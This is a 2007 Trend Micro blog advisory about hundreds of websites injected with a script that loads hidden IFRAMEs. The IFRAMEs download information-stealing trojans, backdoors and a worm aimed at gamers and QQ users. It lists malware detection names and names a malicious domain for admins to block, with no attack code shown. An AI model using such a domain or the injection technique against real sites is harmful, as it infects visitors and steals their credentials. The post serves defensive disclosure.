Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    February 2012
    S M T W T F S
    « Jan    
     1234
    567891011
    12131415161718
    19202122232425
    26272829  
    • About Us
    Malware Blog > Hidden IFRAMEs Launch Malware En Masse

    SANS reports that last November 6, hundreds of Web sites across the Internet were believed to have been compromised by a yet unknown hacker. Details about how and why the attack was perpetrated remain murky. What we know so far is that a certain script which loads http://{BLOCKED}8.net/0.js has been injected into the said sites, the said script leads to a page riddled with invisible IFRAMEs, and these IFRAMEs link to certain pages to automatically download several files.

    Some of the files are already proactively detected by generic patterns. The following are specific detections:

    • BKDR_DELF.HBW
    • TROJ_DELF.LGX
    • TROJ_DELF.MUF
    • TROJ_DELF.NHA
    • TROJ_DLOADER.QRE
    • TROJ_DLOADER.RZI
    • TROJ_DLOADER.SRD
    • TROJ_DOWQUE.ID
    • TROJ_DROPPER.CYP
    • TROJ_DROPPER.CZZ
    • TROJ_GENETIK.KK
    • TROJ_RISK.GD
    • TSPY_LEGMIR.CQQ
    • TSPY_ONLINEG.JCG
    • TSPY_ONLINEG.JVR
    • TSPY_ONLINEG.JZH
    • TSPY_ONLINEG.KCU
    • TSPY_ONLINEG.KEQ
    • TSPY_ONLINEG.KER
    • TSPY_ONLINEG.KES
    • TSPY_ONLINEG.KEU
    • TSPY_ONLINEG.KFH
    • TSPY_ONLINEG.KFJ
    • TSPY_ONLINEG.KFX
    • TSPY_ONLINEG.KGA
    • TSPY_ONLINEG.KGB
    • TSPY_ONLINEG.KGE
    • TSPY_ONLINEG.KGT
    • TSPY_ONLINEG.KWB
    • TSPY_ONLINEG.LMB
    • TSPY_ONLINEG.LPE
    • TSPY_QQGAME.HG
    • TSPY_QQGAME.HQ
    • TSPY_QQPASS.DCI
    • TSPY_WOW.AJZ
    • TSPY_WOW.AKA
    • TSPY_WOW.AKO
    • WORM_QQPASS.DCH

    A rundown of the forty-plus files give us Trojans, spyware, backdoors, and a worm belonging to families such as, but are not limited to ONLINEG, WOW, QQPASS, and QQGAME, which are known information stealers targeting gamers and QQ users. File sizes ranged from 177KB to 2KB, with the largest being backdoor programs. Backdoors open an infected machine’s ports, allowing remote malicious users control over the system.

    Users who visit any of the compromised sites run the risk of getting infected, so gateway admins had better block traffic coming from yl18.net. Trend Micro advises users to deploy technology such as its Total Web Threat Protection in order to remain as secure as possible. Trend Micro Web threat protection technology protects users throughout the network, the gateway and in the Internet cloud.





    Share this article
    		 Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon



    This entry was posted on Thursday, November 8th, 2007 at 5:11 am and is filed under Malicious Sites, Malware . Both comments and pings are currently closed.



    Comments are closed.



     

    Other Trend Micro blogs
    CTO Insights
    CounterMeasures Blog
    Cloud Security Blog
    Consumerization Blog
    Fearless Web
    Internet Safety for Kids & Families
    Simply Security News
    Trend Micro Blog [German]
    TrendLabs Security Blog [Japan]
    Cloud Security APAC
    Trend Micro Free Tools Threat Encyclopedia Trend Micro Videos
    Do you have a product-related question? Visit our eSupport website.

    © Copyright 2011 Trend Micro Inc. All rights reserved. Legal Notice